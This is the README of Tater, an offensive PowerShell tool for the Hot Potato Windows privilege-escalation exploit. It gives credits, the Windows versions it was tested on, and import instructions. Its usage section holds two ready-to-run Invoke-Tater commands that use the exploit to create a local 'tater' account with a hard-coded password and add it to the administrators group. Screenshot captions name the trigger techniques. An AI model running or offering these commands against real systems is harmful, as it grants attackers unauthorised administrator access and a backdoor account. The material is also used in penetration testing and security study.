# Tater
February 6, 2016
Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit.
## Credit
All credit goes to @breenmachine, @foxglovesec, Google Project Zero, and anyone else that helped work out the details for this exploit.
- Potato: https://github.com/foxglovesec/Potato
## Notes
This version has been successful for me on Windows 7, Windows 8.1, Windows 10, and Windows Server 2012 R2. I will hopefully be able to test it on Windows Server 2008 soon. Feel free to open issues here or reach out on Twitter @kevin_robertson with successes or failures for the remaining OS versions.
## Usage
To import with Import-Module:
```powershell
Import-Module ./Tater.ps1
```
To import using the dot source method:
```powershell
. ./Tater.ps1
```
Trigger 1:
```powershell
Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
```
Trigger 2:
```powershell
Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"
```
## Screenshots
- Windows 7 using trigger 1 (NBNS WPAD Bruteforce + Windows Defender Signature Updates)
- Windows 10 using trigger 2 (WebClient Service + Scheduled Task)
- Windows 7 using trigger 1 and UDP port exhaustion